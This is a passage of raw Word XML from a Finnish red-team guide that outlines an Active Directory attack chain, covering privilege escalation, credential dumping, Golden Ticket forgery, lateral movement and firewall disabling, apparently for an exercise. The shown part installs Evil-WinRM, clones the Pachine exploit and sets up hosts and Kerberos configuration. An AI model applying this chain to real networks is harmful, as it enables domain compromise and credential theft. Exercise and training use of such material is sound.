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7646" w14:textId="67A1291A" w:rsidR="009F3FC0" w:rsidRDefault="009F3FC0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6717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D612D" w14:textId="3482E07C" w:rsidR="009F3FC0" w:rsidRDefault="009F3FC0">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="15D8958C" w14:textId="019F7EBE" w:rsidR="00C166D7" w:rsidRDefault="009F3F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34295" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Työkalut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295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3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30EDDC86" w14:textId="3ED244A0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296" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="fi-FI"/>
              </w:rPr>
              <w:t>Hosts määritykset, jos käytössä ei ole proxyä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296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3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3031D127" w14:textId="6FA55E5D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297" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="fi-FI"/>
              </w:rPr>
              <w:t>Hosts määritykset, jos käytössä on proxy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297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3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0231A228" w14:textId="0F3FD047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298" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="fi-FI"/>
              </w:rPr>
              <w:t>Kerberos määritykset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298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3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45269BF7" w14:textId="50F75FD5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299" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BP - DC - Reconnaissance- Vulnerability Scanning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299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4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753A3EDA" w14:textId="7C8CFBB5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0" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BP - DC - Privilege Escalation - Exploitation for Privilege Escalation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0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5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568A2628" w14:textId="68F68D58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1" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BP - DC - Credential Access - Credential Dumping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1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6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0CE6BB34" w14:textId="10655DA3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2" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BP - DC - Credential Access - Steal or Forge Kerberos Tickets Golden Ticket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2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7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0AA8783C" w14:textId="7E4E58C7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3" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BP - DC - Lateral Movement - Remote Services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3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9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7C194E11" w14:textId="6A8F2739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4" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="fi-FI"/>
              </w:rPr>
              <w:t>Evil-WinRM tiedostojen siirto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4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10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71D4CBD2" w14:textId="687C24BD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5" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BP - DC - Lateral Movement - Remote Services Windows - Remote Management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5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10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0B9C3BFE" w14:textId="22246F19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6" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BP - DC - Defense Evasion - File and Directory Permissions Modification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6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12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03B626C4" w14:textId="3BF78436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7" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="fi-FI"/>
              </w:rPr>
              <w:t>BP - DC - Impact - Service Stop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7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13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7DF9D61C" w14:textId="3E5BD470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8" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>BP - DC - Defense Evasion - Impair Defenses Disable or Modify System Firewall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8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13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7497F71D" w14:textId="6B455754" w:rsidR="00C166D7" w:rsidRDefault="00ED35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1534309" w:history="1">
            <w:r w:rsidR="00C166D7" w:rsidRPr="00445A97">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="fi-FI"/>
              </w:rPr>
              <w:t>Sliver implant</w:t>
            </w:r>
            <w:r w:rsidR="00C166D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C166D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C166D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131534309 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C166D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C166D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C166D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00C166D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1685DE08" w14:textId="04F018FD" w:rsidR="009F3FC0" w:rsidRDefault="009F3FC0">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2AB8600E" w14:textId="5346AB77" w:rsidR="009F3FC0" w:rsidRDefault="009F3FC0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="592CD509" w14:textId="77777777" w:rsidR="009F3FC0" w:rsidRDefault="009F3FC0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5199F772" w14:textId="00CBEFBA" w:rsidR="00D57E0C" w:rsidRDefault="004E703C" w:rsidP="002727A6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Useasta eri </w:t>
      </w:r>
      <w:r w:rsidR="00D57E0C">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Blue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D57E0C">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">printeistä </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>hyökkäyksen seuraaminen ja toteuttaminen</w:t>
      </w:r>
      <w:r w:rsidR="00D57E0C">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> on todennäköisesti melko haasteellista, joten </w:t>
      </w:r>
      <w:r w:rsidR="00D41DFB">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>tähän dokumenttiin on kuvattu koko AD:n hyökkäysketju</w:t>
      </w:r>
      <w:r w:rsidR="00533D93">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B778A07" w14:textId="77777777" w:rsidR="00533D93" w:rsidRDefault="00533D93" w:rsidP="002727A6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243E74AD" w14:textId="7BED58E0" w:rsidR="002727A6" w:rsidRDefault="002727A6" w:rsidP="002727A6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Hyökkäysketju vaatii toimiakseen yhdet toimivat tunnukset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FF18EB" w14:textId="77777777" w:rsidR="002727A6" w:rsidRPr="002727A6" w:rsidRDefault="002727A6" w:rsidP="002727A6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457CB226" w14:textId="362428D0" w:rsidR="002727A6" w:rsidRPr="003354E5" w:rsidRDefault="002727A6" w:rsidP="00B541C7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc131534295"/>
      <w:r w:rsidRPr="003354E5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Työkalut</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="66052531" w14:textId="3A135F9E" w:rsidR="002727A6" w:rsidRDefault="002727A6" w:rsidP="22AF54F0">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="22AF54F0">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo Apt-get install </w:t>
      </w:r>
      <w:r w:rsidR="003354E5" w:rsidRPr="003354E5">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>krb5-user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0071D094" w14:textId="530AE5FB" w:rsidR="003B33C0" w:rsidRDefault="003B33C0" w:rsidP="003B33C0">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="22AF54F0">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo Apt-get install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>evil-winrm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D855DF1" w14:textId="77777777" w:rsidR="003B33C0" w:rsidRDefault="003B33C0" w:rsidP="22AF54F0">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3032CA82" w14:textId="19A166CD" w:rsidR="0064551E" w:rsidRDefault="0064551E" w:rsidP="002727A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it clone https://github.com/ly4k/Pachine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3DE3D2F" w14:textId="77777777" w:rsidR="00165315" w:rsidRDefault="00165315" w:rsidP="002727A6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CFB5CE0" w14:textId="244B9382" w:rsidR="00475EAB" w:rsidRPr="00903EEA" w:rsidRDefault="00475EAB" w:rsidP="00475EAB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A881F18" w14:textId="18C95E10" w:rsidR="6D9EE579" w:rsidRPr="00C5129F" w:rsidRDefault="007F0D32" w:rsidP="000D2CB5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc131534296"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Hosts </w:t>
      </w:r>
      <w:r w:rsidR="000D2CB5">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>määritykset,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C1ACD">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>jos käytössä ei ole proxyä</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="283594A5" w14:textId="7B91E1C2" w:rsidR="7BF4DA11" w:rsidRDefault="7BF4DA11" w:rsidP="6D9EE579">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="6D9EE579">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Lisää hosts tiedostoon domainin IP-osoite. D</w:t>
      </w:r>
      <w:r w:rsidR="0976F1FD" w:rsidRPr="6D9EE579">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">omainiin </w:t>
      </w:r>
      <w:r w:rsidRPr="6D9EE579">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>IP on sama, kuin kohde dc:n IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CC2183" w14:textId="2CA9FB58" w:rsidR="569033BD" w:rsidRDefault="12A556FF" w:rsidP="6D9EE579">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21E9F0A2" wp14:editId="64B80446">
            <wp:extent cx="2924175" cy="1076325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="154489567" name="Picture 15448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895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CB3A" w14:textId="2CA9FB58" w:rsidR="009C1ACD" w:rsidRDefault="009C1ACD" w:rsidP="6D9EE579"/>
    <w:p w14:paraId="5A6CF5D7" w14:textId="6731F414" w:rsidR="009C1ACD" w:rsidRDefault="009C1ACD" w:rsidP="009C1ACD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc131534297"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Hosts määritykset, jos </w:t>
      </w:r>
      <w:r w:rsidR="00E22414">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>käytössä on proxy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="3F6F9053" w14:textId="1EFBEE25" w:rsidR="00AC63BA" w:rsidRDefault="00AC63BA" w:rsidP="00AC63BA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[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dc-ip of internal network] [target domain name] [target-dc netbios-name] [target-dc-fqdn]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73456C26" w14:textId="7414FA29" w:rsidR="00AC63BA" w:rsidRDefault="00AC63BA" w:rsidP="00AC63BA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FACEA7B" w14:textId="4FBC4BEF" w:rsidR="00AC63BA" w:rsidRDefault="00AC63BA" w:rsidP="00AC63BA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Esimerkkinä rt domainin määritykset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF88801" w14:textId="790F0900" w:rsidR="00AC63BA" w:rsidRPr="00AC63BA" w:rsidRDefault="00AC63BA" w:rsidP="00AC63BA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59DC9CDE" wp14:editId="0C03859D">
            <wp:extent cx="4239491" cy="3048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34" cy="3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fi-FI"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0430AD17" w14:textId="2CA9FB58" w:rsidR="009C1ACD" w:rsidRPr="009C1ACD" w:rsidRDefault="009C1ACD" w:rsidP="6D9EE579">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB47A6E" w14:textId="4A36FCF6" w:rsidR="6D9EE579" w:rsidRDefault="6D9EE579" w:rsidP="6D9EE579">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A79924" w14:textId="77777777" w:rsidR="000D2CB5" w:rsidRDefault="000D2CB5" w:rsidP="000D2CB5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc131534298"/>
      <w:r w:rsidRPr="00C5129F">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Kerberos määritykset</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4F1CB426" w14:textId="77777777" w:rsidR="00E22414" w:rsidRDefault="00E22414" w:rsidP="00E22414">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4FD9">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Lisää tiedostoon /etc/krb5.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> seuraavat rivit. Muuta kohde vastaamaan todellista kohdetta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12973D70" w14:textId="77777777" w:rsidR="00E22414" w:rsidRPr="00E22414" w:rsidRDefault="00E22414" w:rsidP="00E22414">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A98AA4" w14:textId="67388800" w:rsidR="000D2CB5" w:rsidRPr="000D2CB5" w:rsidRDefault="000D2CB5" w:rsidP="000D2CB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B541C7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EC65158" wp14:editId="192BAC02">
            <wp:extent cx="3495675" cy="305282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101" cy="30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61B" w14:textId="4CC22034" w:rsidR="000C4FD9" w:rsidRDefault="000C4FD9" w:rsidP="002727A6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B964BD3" w14:textId="77777777" w:rsidR="00366C6D" w:rsidRPr="00C5129F" w:rsidRDefault="00366C6D" w:rsidP="00366C6D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5129F">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[libdefaults]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E217D2F" w14:textId="412291A7" w:rsidR="00366C6D" w:rsidRPr="000C4FD9" w:rsidRDefault="00366C6D" w:rsidP="00366C6D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5129F">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4FD9">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">default_realm = </w:t>
      </w:r>
      <w:r w:rsidR="000C4FD9" w:rsidRPr="000C4FD9">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[domain]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FEF36B" w14:textId="77777777" w:rsidR="00366C6D" w:rsidRPr="000C4FD9" w:rsidRDefault="00366C6D" w:rsidP="002727A6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D57B946" w14:textId="77777777" w:rsidR="00BB390F" w:rsidRPr="000C4FD9" w:rsidRDefault="00BB390F" w:rsidP="00BB390F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4FD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[realms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196B7C50" w14:textId="744F61FE" w:rsidR="00BB390F" w:rsidRPr="000C4FD9" w:rsidRDefault="00BB390F" w:rsidP="00BB390F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4FD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="004510B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">[domain] </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4FD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>= {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8CC049" w14:textId="189D11DB" w:rsidR="00BB390F" w:rsidRPr="000C4FD9" w:rsidRDefault="00BB390F" w:rsidP="00BB390F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4FD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">                kdc = </w:t>
      </w:r>
      <w:r w:rsidR="000C4FD9" w:rsidRPr="000C4FD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[dc-fqdn]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B98556" w14:textId="039ECF96" w:rsidR="00BB390F" w:rsidRPr="000C4FD9" w:rsidRDefault="00BB390F" w:rsidP="00BB390F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4FD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">                admin_server = </w:t>
      </w:r>
      <w:r w:rsidR="000C4FD9" w:rsidRPr="000C4FD9">
        <w:rPr>
